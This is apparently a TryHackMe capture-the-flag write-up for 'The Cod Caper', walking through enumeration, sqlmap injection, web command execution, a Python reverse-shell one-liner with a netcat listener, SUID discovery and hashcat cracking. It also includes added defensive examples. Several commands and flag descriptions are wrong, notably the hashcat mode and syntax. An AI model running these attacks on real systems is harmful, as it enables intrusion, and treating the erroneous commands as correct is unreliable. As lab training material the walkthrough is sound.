The Cod Caper (TryHackMe) — A Write-Up

FOREWORD: We all get stuck, which is why write-ups exist; however, I would suggest you try your best to come up with the correct answer before seeking it. Most problems are meant to be solved, but a process must be followed, which is why I explain the various steps/commands used in order to arrive at a solution. Do your best! Enjoy the process!

The Cod Caper

This room is a beginner-friendly room that allows users to infiltrate and exploit a Linux-based system.

[ Task 1 — Intro ]

No answer Needed

[ Task 2 — Host Enumeration ]

The objective of this task is to obtain as much information as possible about any open ports on the given machine.

Useful flags :

Flag   Use
-p     Used to specify which port to analyze. This can also be used to specify a range of ports, i.e. -p 1-1000
-sV    Runs default scripts on the port, used for doing basic analysis on services running on a port
-A     Aggressive mode, obtains all related information

How many ports are open on the target machine?

To get this result, an nmap scan must be done on all ports on the given IP address. Following the guide provided, I came up with nmap -p 1-1000 -sC -A <GIVEN IP ADDRESS>, which provides the following output and the answers to all of the questions in this section:

From the given output it is determined that there are 2 open ports on the target machine.

What is the http-title of the web server?

Apache2 Ubuntu Default Page: It works

What version is the ssh service?

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

What is the version of the web server?

Apache/2.4.18

[ Task 3 — Web Enumeration ]

The objective of this task is to research the web server for any vulnerabilities using gobuster, a brute-force directory enumeration tool.

Recommended tool: gobuster

Flag        Use
-x          Specifies file extensions such as php,txt,html
-u          Specifies which URL to use
-t          Specifies the number of CPU threads to be used
--wordlist  Specifies which word list is appended to the URL path, such as "http://url.com/word1", "http://url.com/word2"
dir         Specifies directory to be enumerated

The objective of this task is simple. The goal is to familiarize the user with useful commands needed to navigate servers in order to locate potential vulnerabilities.

What is the name of the important file on the server?

From the previous exercise using nmap, I found that port 80 is open on the machine. So I checked in the browser using the given IP, which leads us to the default page.

With this information I am now able to use the Kali Gobuster tool to enumerate the directories.

When I combined the given flags with the given IP address and the wordlist common.txt (gobuster dir -u <GIVEN IP ADDRESS> --wordlist /usr/share/wordlists/dirb/common.txt -x html,php,txt), I came up with the following result:

Based on the output, administrator.php seems to be an important file that would contain valuable information that could be exploited.

Reference

Kali Gobuster Tool

[ Task 4 — Web Exploitation ]

For this task the objective is to successfully crack the password to the administrator account via SQL injection, using sqlmap, an open-source tool used to exploit SQL injection flaws in servers.

Flag     Use
-u       Specifies the URL to be attacked
--forms  Used to automatically select the parameters
--dump   Used to retrieve all data once the SQLI is found
-a       Retrieves all information from the database

What is the admin username?

A SQL injection must be done to obtain this information, using the related commands and sqlmap. I used sqlmap -u http://<GIVEN IP ADDRESS>/administrator.php --forms --dump, which gives this result and access to the website:

What is the admin password?

Using the output from the previous question, we get secretpass.

How many forms of SQLI is the form vulnerable to?

Once we are able to access the site, we are brought to a command prompt screen. To find the number of vulnerabilities, I simply re-used the command I used in question 1 WITHOUT the --dump option, since we are only looking for the number of vulnerabilities. sqlmap -u http://10.10.220.130/administrator.php --forms provides an output of 3 SQLI forms.
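Why sqlmap finds the login form injectable, as an added example that is not part of the write-up or the room: a constructed login check that splices the submitted username and password straight into the SQL text, next to the parameterized version that treats them as data. The table, the in-memory sqlite database and the sample credentials (admin/secretpass) are constructed stand-ins; the room's real username comes only from the sqlmap output.

```python
import sqlite3

# Constructed sample credentials; the real admin username is in the sqlmap output, not here.
SAMPLE_USER, SAMPLE_PASS = "admin", "secretpass"


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's user table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (SAMPLE_USER, SAMPLE_PASS))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Login check that splices user input into the SQL text: the class of bug sqlmap finds.
    A username of  ' OR 1=1 --  turns the WHERE clause into 'always true' and comments out
    the password comparison entirely."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the input can never become SQL syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0
```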

[ Task 5 — Command Execution ]

This section requires research to determine if the user's old account is active. If it is, we need to find whether specific files remain.

How many files are in the current directory?

I obtained this answer by utilizing the ls function on the command screen that we gained access to from the previous exercise. The following output shows that there are 3 files:

Do I still have an account?

To begin, you need to open up a listening port using netcat on your machine: nc -lnvp 1234

A reverse shell is needed to perform the command necessary to solve this problem. I used python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<GIVEN IP ADDRESS>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I used curl -s --data-urlencode "cmd=cat /etc/passwd" -X POST http://<PROVIDED IP ADDRESS>/2591c98b70119fe624898b1e424b5e91.php | grep -v -e "^$" | grep -v "<". I used the curl command since we are transferring data, with the flags needed to obtain the answer: yes

As you can see “Pingu” is still listed as an account.

What is my SSH password?

So we figured out that Pingu still has an account. Now we have to figure out the associated password. To do this we will need to use the find command to search through all of the files owned by Pingu. My first thought was to use the find command to search for any shadow files that may contain passwords: find / 2>>/dev/null | grep -i shadow.

I found a backup shadow directory! Let's use cat to see the contents!

This didn't help. Next, I used the find command to search for any content containing "pass": find / 2>>/dev/null | grep -i pass (I switched to the webpage interface for this one). This is what populates:

/var/hidden/pass! Let's cat this file.

We found the password pinguapingu!
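From the defender's side, the command execution in this task leaves process-start records behind: a shell spawned by the web server's account and, a few seconds later, the python one-liner that connects a socket and duplicates stdin/stdout/stderr onto it. The following is an added example, not part of the write-up, that triages constructed process records (timestamp, user, command line; sample data) for those two patterns; the record layout and the web-account names are assumptions.

```python
import re

# Constructed process-start records ("timestamp user command-line"); sample data, not real logs.
SAMPLE_RECORDS = [
    "2021-10-01T10:00:01 www-data /bin/sh -c ls -la",
    "2021-10-01T10:00:07 www-data python -c import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.5\",1234));"
    "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);",
    "2021-10-01T10:00:09 www-data /bin/sh -c cat /etc/passwd",
    "2021-10-01T10:02:33 pingu find / -perm -u=s -type f 2>/dev/null",
    "2021-10-01T10:03:00 root python -c print(1+1)",
]

# Three independent signals of a scripted reverse shell: an outbound socket connect,
# fds 0/1/2 duplicated onto another descriptor, and an interactive shell being spawned.
SIGNALS = {
    "socket_connect": re.compile(r"\bconnect\s*\(\s*\("),
    "fd_redirect": re.compile(r"\bdup2\s*\(.*?,\s*[012]\s*\)"),
    "interactive_shell": re.compile(r"/bin/(?:ba|da)?sh\W.*?-i\b"),
}
# Accounts a web server runs as (assumption; adjust to the host being monitored).
WEB_USERS = {"www-data", "apache", "nginx"}
INTERPRETER_ONELINER = re.compile(r"(?:/bin/\S*sh|python\S*|perl|php)\b\s+-c\b")


def reverse_shell_signals(cmdline: str) -> set:
    """Names of the reverse-shell signals present in one command line."""
    return {name for name, rx in SIGNALS.items() if rx.search(cmdline)}


def triage(record: str) -> tuple:
    """Return (user, verdict) for one record. Two or more signals => reverse shell;
    a shell/interpreter one-liner run by the web account => web command execution."""
    _timestamp, user, cmdline = record.split(" ", 2)
    if len(reverse_shell_signals(cmdline)) >= 2:
        return user, "reverse-shell"
    if user in WEB_USERS and INTERPRETER_ONELINER.match(cmdline):
        return user, "web-command-execution"
    return user, "benign"


def alerts(records) -> list:
    """Every non-benign record as (timestamp, user, verdict), in log order."""
    out = []
    for rec in records:
        user, verdict = triage(rec)
        if verdict != "benign":
            out.append((rec.split(" ", 1)[0], user, verdict))
    return out
```

Requiring two of the three signals keeps a lone dup2 or a plain socket client from alerting, while the web-account rule still surfaces the earlier ls and cat /etc/passwd executions that preceded the shell.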

References

netcat
sqlmap
Python — Reverse Shell
curl

[ Task 6 — LinEnum ]

In this task the objective is to download LinEnum and use it for privilege escalation. First, I used ssh and the login information obtained from the previous task to log in as Pingu: ssh pingu@<GIVEN IP ADDRESS>

Next I used the command find / -perm -u=s -type f 2>/dev/null to locate the SUID files, which gave me this:

A secret path? Sounds very interesting to me! /opt/secret/root
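The SUID hunt above, as an added example that is not part of the write-up: a small Python equivalent of the find command that also diffs the result against a baseline of expected setuid binaries, which is how a defender spots a planted one such as /opt/secret/root. The baseline contents, the demo tree and the pseudo-filesystem list are assumptions.

```python
import os
import stat
import tempfile

# Constructed baseline of setuid binaries expected on this kind of host (illustrative, not exhaustive).
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/ping", "/usr/bin/chsh"}
PSEUDO_FS = {"proc", "sys", "dev", "run"}   # no real binaries live here; skip them


def find_suid(root: str) -> list:
    """Every regular file under `root` with the setuid bit, as a path relative to `root` with a
    leading slash, so a test tree or mounted image compares against baseline paths.
    On a live host with root="/" this is `find / -perm -u=s -type f 2>/dev/null`."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:
            dirnames[:] = [d for d in dirnames if d not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)      # lstat: judge the file itself, never a symlink target
            except OSError:
                continue                 # unreadable entries: the same as 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append("/" + os.path.relpath(path, root))
    return sorted(hits)


def unexpected_suid(root: str, baseline=BASELINE) -> list:
    """SUID files not in the baseline: the ones worth a closer look (here, /opt/secret/root)."""
    return [p for p in find_suid(root) if p not in baseline]


def build_demo_tree() -> str:
    """Constructed sample tree: one expected SUID binary, one planted under /opt/secret,
    and one ordinary executable. Returns the temporary root directory."""
    root = tempfile.mkdtemp()
    for rel, mode in (("usr/bin/passwd", 0o4755), ("opt/secret/root", 0o4755), ("bin/ls", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")      # placeholder content; only the mode bits matter
        os.chmod(path, mode)
    return root
```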

Reference

LinEnum SUID

The next few tasks go over tools that can be used to carry out "Binary Exploitation". Everyone has their own way of doing things, so various exploitation methods are explained. There are no tasks to be completed, but there is a lot of information to retain and use for the final tasks.

[ Task 7 — pwndbg ]

No answer needed

[ Task 8 — Binary Exploitation: Manually ]

No answer needed

Reference

Disassemble Shell

[ Task 9 — Binary Exploitation: The pwntools way ]

No answer needed

Reference

pwnTools

[ Task 10 — Finishing The Job ]

This task requires us to crack the root hash using the hash we received from the previous task, $6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck. It is recommended that we use the following: hashcat {flags} {hashfile} {wordlist}, with the following flags:

I copied the hash and saved it as llama.txt. Now I am going to attempt cracking the file using hashcat -m 0 -a 0 -o llama.txt /usr/share/wordlists/rockyou.txt. Let's see what we get! FYI, this may take a while.

Flag   Use
-a     Used to specify attack mode
-m     Used to specify which mode to use

Got it! love2fish

References

Hashcat
Hashcat Modes

This room was a bit difficult for me and took me longer than I expected. I spent a lot of time researching various tools and commands that I found myself unfamiliar with. However, in the end I completed it, which is all that matters!

Congratulations on completing The Cod Caper !
